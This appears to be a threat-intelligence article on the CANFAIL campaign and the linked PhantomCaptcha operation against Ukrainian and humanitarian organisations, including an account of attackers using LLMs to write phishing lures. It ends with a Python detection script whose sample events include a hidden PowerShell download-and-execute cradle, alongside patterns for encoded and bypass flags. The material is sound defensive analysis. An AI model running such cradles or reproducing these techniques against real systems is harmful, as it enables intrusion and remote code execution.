CANFAIL Malware: How a Suspected Russian Threat Actor Is Using AI to Target Ukraine's Critical Infrastructure

A previously undocumented group leverages LLM-generated phishing lures, multi-stage JavaScript payloads, and WebSocket RATs in a sustained campaign against defense, energy, and humanitarian organizations. Sources: Google Threat Intelligence Group, SentinelOne SentinelLABS, Digital Security Lab of Ukraine.

Introduction

On February 12, 2026, Google Threat Intelligence Group (GTIG) published two companion reports that together paint a sobering picture of the evolving cyber threat landscape facing Ukraine and the global defense industrial base. The first, a quarterly AI threat tracker, detailed how state-backed actors from Russia, China, Iran, and North Korea are increasingly integrating artificial intelligence into every phase of the attack lifecycle. The second focused specifically on the sustained cyber pressure being applied to the defense sector by nation-state actors and criminal groups worldwide.

Buried within these reports was a revelation that immediately caught the attention of the threat intelligence community: the identification of a previously undocumented threat actor, suspected of ties to Russian intelligence services, that has been conducting phishing operations to deliver a malware family called CANFAIL against Ukrainian organizations. What makes this actor especially noteworthy is not raw sophistication—GTIG acknowledged the group is less capable than established Russian APT groups—but rather its deliberate use of large language models to compensate for those limitations and systematically expand its targeting scope.

This article provides a detailed technical breakdown of the CANFAIL campaign, its connection to the previously disclosed PhantomCaptcha operation, the broader context of Russian cyber operations against Ukraine, and what this development means for defenders.

The Threat Actor: Profile and Attribution

GTIG described the newly identified group as suspected to be linked to Russian intelligence services, a phrasing that signals assessed but not fully confirmed attribution. The group has not been assigned a formal APT designation in public reporting, though GTIG tracks it internally under an unattributed cluster designation. It remains distinct from well-known Russian cyber units such as APT28 (Fancy Bear, GRU Unit 26165), APT29 (Cozy Bear, SVR), or APT44 (Sandworm, GRU Unit 74455), all of which operate at significantly higher levels of sophistication and resourcing.

"GTIG has recently discovered a threat group suspected to be linked to Russian intelligence services which conducts phishing operations to deliver CANFAIL malware primarily against Ukrainian organizations." — Google Threat Intelligence Group, Threats to the Defense Industrial Base, February 10, 2026

The group's primary targets include defense, military, government, and energy organizations within Ukrainian regional and national governments. However, GTIG noted that the targeting aperture has been expanding. The actor has shown growing interest in aerospace organizations, manufacturing companies with military and drone ties, nuclear and chemical research organizations, and international organizations involved in conflict monitoring and humanitarian aid in Ukraine.

The geographic scope extends beyond Ukraine as well. GTIG reported that the group has impersonated a Romanian energy company that works with customers in Ukraine, targeted a Romanian firm directly, and conducted reconnaissance against Moldovan organizations. This suggests an intelligence collection mandate that encompasses not just Ukraine itself, but the broader regional ecosystem of nations involved in supporting or interacting with Ukraine's critical infrastructure.

The AI Dimension: LLMs as a Force Multiplier

Perhaps the most significant aspect of this disclosure is the confirmed role of large language models in the threat actor's operations. GTIG stated plainly that despite being less sophisticated and resourced than other Russian threat groups, this actor recently began to overcome some technical limitations using LLMs.

"Despite being less sophisticated and resourced than other Russian threat groups, this actor recently began to overcome some technical limitations using LLMs. Through prompting, they conduct reconnaissance, create lures for social engineering, and seek answers to basic technical questions for post-compromise activity and C2 infrastructure setup." — Google Threat Intelligence Group, Threats to the Defense Industrial Base, February 10, 2026

The group's LLM use spans several phases of the attack lifecycle: reconnaissance, lure creation for social engineering, and basic technical troubleshooting for post-compromise activity and C2 setup. This is a concrete, real-world case study of how AI tools lower the barrier to entry for offensive cyber operations.

Context: GTIG Q4 2025 AI Threat Tracker

This finding was published alongside GTIG's broader AI threat tracker for Q4 2025, which documented how government-backed threat actors from Russia, China, Iran, and North Korea are increasingly integrating AI to achieve productivity gains in reconnaissance, social engineering, and malware development. The tracker also documented UNC6418, a separate unattributed actor that used Gemini to conduct targeted intelligence gathering—seeking out sensitive account credentials and email addresses before launching phishing campaigns focused on Ukraine and the defense sector. While it remains unclear whether the CANFAIL actor specifically used Gemini or other LLM platforms, the operational pattern is consistent. The tracker noted that while no APT group has yet achieved breakthrough capabilities that fundamentally alter the threat landscape through AI, the trend line is clear: AI-augmented operations are becoming standard practice, not an exception.

For the CANFAIL actor specifically, GTIG's analysis concluded that the phishing lures used in campaigns appear to be LLM-generated, characterized by formal language and the mimicry of specific official templates. This is a meaningful operational advantage. Historically, many Russian-linked campaigns targeting Ukrainian organizations produced lures with linguistic imperfections or formatting inconsistencies that served as red flags for trained analysts and alert recipients. AI-generated content can eliminate these telltale signs, producing communications that closely replicate the tone, structure, and vocabulary of legitimate government or corporate correspondence.

Technical Breakdown: The CANFAIL Kill Chain

The CANFAIL attack chain follows a multi-stage process that, while not revolutionary in its individual components, is effective in its execution and designed to evade common detection mechanisms.

Stage 1: Reconnaissance and Target Selection

The threat actor generates email address lists tailored to specific regions and industries based on its research. LLM tooling appears to accelerate this step, letting the actor rapidly profile organizations and individuals across multiple sectors without the overhead of dedicated intelligence infrastructure.

Stage 2: Phishing Delivery

Recent campaigns have involved the threat actor impersonating legitimate national and local Ukrainian energy organizations to obtain unauthorized access to organizational and personal email accounts. In other instances, the group has masqueraded as a Romanian energy company that works with customers in Ukraine. The phishing emails contain lures that GTIG assessed as likely LLM-generated, using formal language and specific official templates. These messages embed Google Drive links pointing to a RAR archive containing the CANFAIL payload.

Trusted Platform Abuse

The use of Google Drive links to host malicious RAR archives is a deliberate choice. By routing delivery through a trusted cloud platform, the actor bypasses URL reputation filters that would flag unknown or newly registered domains. Organizations should implement content inspection for files downloaded from cloud storage services, even those from well-known providers, and consider restricting automatic file downloads from external cloud storage links embedded in email.

Stage 3: The CANFAIL Payload

CANFAIL itself is an obfuscated JavaScript malware typically disguised with a double extension—for example, document.pdf.js—to make it appear as a PDF file to the victim. The double-extension technique exploits a default behavior in many Windows environments where known file extensions are hidden, causing the file to display as simply document.pdf in the file explorer.

When executed, CANFAIL performs two simultaneous actions. First, it displays a fake error popup to the victim, creating the impression that the file failed to open properly. This social engineering element is designed to prevent the target from investigating further or becoming suspicious. Second, it executes a PowerShell script that downloads and executes an additional stage, typically a memory-only PowerShell dropper.

The memory-only execution is a critical design choice. By avoiding writing payloads to disk, the malware significantly reduces the likelihood of detection by traditional antivirus solutions and endpoint protection platforms that rely on file-based scanning. The dropper establishes persistence and prepares the environment for the final payload deployment.

"CANFAIL is obfuscated JavaScript which executes a PowerShell script to download and execute an additional stage, most commonly a memory-only PowerShell dropper. It additionally displays a fake 'error' popup to the victim." — Google Threat Intelligence Group

The PhantomCaptcha Connection

GTIG explicitly linked the CANFAIL activity to a campaign called PhantomCaptcha that was previously disclosed by SentinelOne's SentinelLABS and the Digital Security Lab of Ukraine on October 22, 2025. This connection is significant because PhantomCaptcha represented one of the more sophisticated and carefully orchestrated single-day phishing operations documented in recent months.

The PhantomCaptcha campaign, launched on October 8, 2025, targeted individual members of the International Committee of the Red Cross (ICRC), the Norwegian Refugee Council, the United Nations Children's Fund (UNICEF) Ukraine office, the Council of Europe's Register of Damage for Ukraine, and Ukrainian regional government administrations in the Donetsk, Dnipropetrovsk, Poltava, and Mykolaiv regions. The target list pointed to an adversary seeking intelligence across humanitarian operations, reconstruction planning, and international coordination efforts related to Ukraine's war relief.

The PhantomCaptcha attack chain used emails impersonating the Ukrainian President's Office. These contained an eight-page weaponized PDF document—crafted to resemble a legitimate governmental communiqué—with an embedded link that redirected victims to a fake Zoom site hosted at zoomconference[.]app. On that site, victims encountered what appeared to be a Cloudflare DDoS protection verification page—a familiar sight to any regular internet user—featuring a fake "I'm not a robot" checkbox.

This was a variant of the ClickFix (also called Paste and Run) social engineering technique, which has been widely adopted by threat actors since mid-2024. In the PhantomCaptcha variant, the fake CAPTCHA tricked Windows users into copying a "token" and then pressing Windows + R to open the Run dialog before pasting and executing the command—which was actually a PowerShell script designed to compromise their system. SentinelLABS noted that this social engineering technique is particularly effective because the malicious code is executed by the user themselves, evading endpoint security controls that focus solely on detecting malicious files.

The final payload delivered through PhantomCaptcha was a WebSocket-based Remote Access Trojan (RAT) hosted on Russian-owned infrastructure. SentinelLABS described it as enabling arbitrary remote command execution, data exfiltration, and potential deployment of additional malware.

"The final payload is a WebSocket RAT hosted on Russian-owned infrastructure that enables arbitrary remote command execution, data exfiltration, and potential deployment of additional malware." — SentinelOne SentinelLABS, PhantomCaptcha: Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation, October 22, 2025

The C2 server was hosted at bsnowcommunications[.]com, which remained active even after the user-facing attack domains were taken offline—a deliberate compartmentalization strategy designed to maintain access to already-compromised systems while protecting core infrastructure from detection.

What made PhantomCaptcha particularly notable from an operational security standpoint was its timing discipline. Infrastructure preparation began as early as March 27, 2025—a full six months before the attack—with the domain goodhillsenterprise[.]com registered to serve obfuscated PowerShell scripts. SSL certificates were issued in September 2025. Yet the user-facing attack domain was active for only a single day. After the campaign, the attackers swiftly dismantled user-facing domains while maintaining backend command-and-control capabilities. SentinelLABS assessed this pattern as indicative of an adversary with extensive operational planning, compartmentalized infrastructure, and deliberate exposure control.

Attribution Note: Possible COLDRIVER Overlap

SentinelLABS identified tactical and technical overlaps between PhantomCaptcha and COLDRIVER (also tracked as Star Blizzard or UNC4057), a threat cluster attributed to Russia's Federal Security Service (FSB). These overlaps include the ClickFix lure technique and the use of Russian-hosted C2 infrastructure. Attribution was not confirmed at the time of SentinelLABS' October 2025 publication. When GTIG later linked PhantomCaptcha to the CANFAIL actor in February 2026, it maintained the characterization of the group as "suspected" Russian intelligence—stopping short of a specific agency or unit attribution. Defenders should treat this connection as a working hypothesis subject to revision as additional technical evidence emerges.

SentinelLABS' infrastructure analysis also uncovered a secondary operation linked to the PhantomCaptcha campaign: fake Android applications hosted on the domain princess-mens[.]click, designed to harvest contacts, call logs, media files, geolocation data, and device information from compromised mobile devices. This suggests a multi-platform intelligence collection capability that extends beyond traditional desktop-based phishing, and indicates an adversary with both the intent and capacity to conduct parallel mobile surveillance operations.

Broader Russian Cyber Operations Against Ukraine

The CANFAIL actor does not operate in isolation. GTIG's defense industrial base report documented a constellation of Russian-nexus threat groups actively targeting Ukrainian military, defense, and critical infrastructure organizations, each with distinct capabilities and operational mandates.

APT44 (also known as Sandworm or FROZENBARENTS), linked to GRU Unit 74455, remains the most consequential Russian cyber actor in the conflict. The group has sought to extract data from Signal and Telegram, using tools like WAVESIGN and INFAMOUSCHISEL to steal information from Windows and Android devices—including from mobile devices captured on the battlefield during Russia's ongoing invasion of Ukraine.

GTIG also identified TEMP.Vermin, tied to actors linked to the Luhansk People's Republic (LPR), which deployed malware families such as VERMONSTER and SPECTRUM using aerospace and drone-themed domains. UNC5125 targeted frontline drone units with Google Forms-based lures and malware including MESSYFORK and GREYBATTLE. Meanwhile, UNC5792 and UNC4221 abused features in Signal and WhatsApp—using fake group invites and phishing pages—to hijack accounts and deploy malware such as STALECOOKIE and TINYWHALE.

"Russia's use of cyber operations in support of military objectives in the war against Ukraine and beyond is multifaceted. On a tactical level, targeting has broadened to include individuals in addition to organizations in order to support frontline operations and beyond, likely due at least in part to the reliance on public and off-the-shelf technology rather than custom products." — Google Threat Intelligence Group, Threats to the Defense Industrial Base, February 10, 2026

Consistent with that assessment, Russian threat actors have targeted secure messaging applications used by the Ukrainian military to communicate and orchestrate military operations, including via attempts to exfiltrate locally stored databases of these apps from mobile devices captured during Russia's ongoing invasion of Ukraine.

GTIG has also identified attempts to compromise users of battlefield management systems such as Delta and Kropyva, underscoring the critical role these platforms play in coordinating Ukrainian military operations and the corresponding value they represent as intelligence targets.

Implications for Defenders

The CANFAIL campaign and its broader context carry several important takeaways for security teams, regardless of whether their organizations are directly within the threat actor's current targeting scope.

AI-augmented phishing demands updated training. Traditional security awareness programs that teach employees to look for grammatical errors, awkward phrasing, or formatting inconsistencies in phishing emails are increasingly insufficient. When threat actors use LLMs to generate lures, those linguistic red flags largely disappear. Organizations should update training to emphasize verification of sender identity, suspicion of unexpected attachments or links regardless of language quality, and institutional procedures for confirming unusual requests through out-of-band communication channels.

The double-extension trick remains effective. Despite being a well-documented technique, the use of .pdf.js double extensions continues to succeed because many Windows environments hide known file extensions by default. Organizations should enforce group policies that display full file extensions and implement email gateway rules that flag or block executable file types within archives.

Memory-only payloads require behavioral detection. CANFAIL's use of memory-only PowerShell droppers underscores the limitations of signature-based antivirus. Endpoint detection and response (EDR) solutions with behavioral monitoring capabilities—particularly those that flag suspicious PowerShell execution patterns, encoded command lines, and in-memory injection techniques—are essential for detecting this class of threat.

ClickFix is a growing social engineering vector. The ClickFix technique documented in the PhantomCaptcha campaign represents a particularly insidious form of social engineering because it causes victims to execute malicious code themselves, effectively bypassing endpoint security controls that monitor for malicious file execution. Defenders should implement application control policies that restrict unauthorized PowerShell execution and monitor for clipboard-based command execution patterns. End-user training should specifically address instructions that prompt users to paste commands into Windows Run dialogs or terminal windows.
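As an added example, not code from GTIG, SentinelLABS or this article, the following Python triage function turns the behavioral points above (the .pdf.js double extension, a script host spawning a hidden or encoded PowerShell stage, and a download cradle launched from explorer.exe as the Run dialog would) into checks over constructed records shaped like Sysmon Event ID 1 process-creation fields. The sample events, rule names and the score threshold are assumptions for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed records in the shape of Sysmon Event ID 1 (process creation)
# fields. Written for this example; not telemetry from any real incident.
SAMPLE_EVENTS = [
    # 0: a double-extension script opened through the default .js handler
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\u\Downloads\document.pdf.js"'},
    # 1: the script host spawning a hidden, encoded PowerShell stage (-enc value is a placeholder)
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -ep bypass -enc AAAAAAAAAAAAAAAAAAAA"},
    # 2: ClickFix-style launch: explorer.exe is the parent (as for the Run
    #    dialog) and the command is an in-memory download cradle
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -w hidden -c iex (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    # 3: benign interactive shell opened by the user
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe"},
    # 4: benign scheduled script
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Document-looking name followed by a scripting extension, e.g. document.pdf.js
DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|txt)\.(?:js|jse|vbs|vbe|wsf|hta)\b", re.I)
# Flags and tokens that, in combination, characterise a memory-only stage loader.
CRADLE_TOKENS = [re.compile(p, re.I) for p in (
    r"(?<![\w-])-(?:e|ec|enc|encodedcommand)\b",   # encoded command line
    r"-w(?:indowstyle)?\s+hidden",                  # no visible window
    r"-e(?:xecutionpolicy|p)\s+bypass",             # policy bypass
    r"\bnop\b|-noprofile",                          # skip profile
    r"\biex\b|invoke-expression",                   # run downloaded text
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient",
)]

def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def cradle_score(cmdline: str) -> int:
    """Number of distinct cradle indicators present in a command line."""
    return sum(1 for t in CRADLE_TOKENS if t.search(cmdline))

def triage(event: dict) -> list[str]:
    """Return the rule names an event matches; an empty list means no finding."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    hits: list[str] = []
    if image in SCRIPT_HOSTS and DOUBLE_EXT.search(cmd):
        hits.append("double_extension_script")
    if image in SHELLS:
        score = cradle_score(cmd)
        if parent in SCRIPT_HOSTS:
            hits.append("script_host_spawned_powershell")
        if score >= 2:  # threshold is an assumption; tune against local baselines
            hits.append("memory_only_cradle_flags")
        if parent == "explorer.exe" and score >= 2:
            hits.append("clickfix_run_dialog_pattern")  # heuristic, not proof
    return hits

def triage_all(events: list[dict]) -> dict[int, list[str]]:
    return {i: h for i, e in enumerate(events) if (h := triage(e))}
```

Running triage_all over the constructed events flags records 0, 1 and 2 and leaves the interactive shell and scheduled script unflagged, which is the false-positive check that matters before deploying a rule like this.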

Google Drive and legitimate cloud services as delivery mechanisms. The use of Google Drive links to host malicious RAR archives demonstrates how threat actors leverage trusted cloud platforms to bypass URL reputation filtering. Organizations should implement content inspection for files downloaded from cloud storage services, even those from well-known providers, and consider policies that restrict automatic file downloads from external cloud storage links in email.

Mobile devices are part of the attack surface. The Android spyware component associated with PhantomCaptcha is a reminder that threat actors in this cluster are not limiting themselves to Windows endpoints. Organizations operating in or adjacent to the conflict zone should include mobile device management policies in their threat response posture, particularly for personnel who may be targeted individually rather than through organizational infrastructure.

What This Tells Us About Where Things Are Heading

The CANFAIL actor represents an archetype that is likely to become more common in the threat landscape: a lower-tier, less-resourced group that uses commercially available AI tools to compensate for skill gaps and scale operations beyond what would otherwise be possible with its organic capabilities. GTIG's assessment that the group has begun to overcome technical limitations through LLM use should be read as a leading indicator, not an isolated case.

The convergence of AI-augmented reconnaissance, professionally crafted phishing lures, multi-stage in-memory malware, and the exploitation of trusted cloud platforms creates a compound threat that is more challenging to detect and defend against than any single one of those elements alone. When combined with the operational discipline demonstrated in the PhantomCaptcha campaign—six months of infrastructure preparation for a single-day operation, compartmentalized domain management, and swift teardown of attack infrastructure—the picture that emerges is of an adversary that, while not yet in the top tier of Russian cyber capability, is learning and adapting rapidly.

For organizations operating in Ukraine, the broader Eastern European region, or in sectors that intersect with the conflict—defense, energy, humanitarian aid, aerospace, and manufacturing—the CANFAIL campaign is a reminder that the threat landscape is not static. New actors continue to emerge, existing techniques are being refined through AI augmentation, and the targeting aperture continues to widen.

The clarity to understand what's happening and what to do about it starts with visibility into threats like this one.

Sources

  • Google Threat Intelligence Group, "GTIG AI Threat Tracker: Distillation, Experimentation, and (Continued) Integration of AI for Adversarial Use," February 12, 2026. cloud.google.com
  • Google Threat Intelligence Group, "Threats to the Defense Industrial Base," February 10, 2026. cloud.google.com
  • SentinelOne SentinelLABS, "PhantomCaptcha: Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation," October 22, 2025. sentinelone.com
  • The Hacker News, "Google Ties Suspected Russian Actor to CANFAIL Malware Attacks on Ukrainian Orgs," February 13, 2026. thehackernews.com
  • Security Affairs (Pierluigi Paganini), "Suspected Russian hackers deploy CANFAIL malware against Ukraine," February 13, 2026. securityaffairs.com
  • Industrial Cyber, "Google flags sustained cyber pressure on defense industrial base from Russia, China-linked actors," February 10, 2026. industrialcyber.co
  • BleepingComputer (Bill Toulas), "PhantomCaptcha ClickFix attack targets Ukraine war relief orgs," October 22, 2025. bleepingcomputer.com
  • Digital Security Lab of Ukraine (co-published with SentinelOne SentinelLABS), "PhantomCaptcha" campaign analysis, October 22, 2025. dslua.org
  • Google Cloud Blog (GTIG), "Threats to the Defense Industrial Base," February 10, 2026. cloud.google.com (primary source for CANFAIL attribution and quoted passages)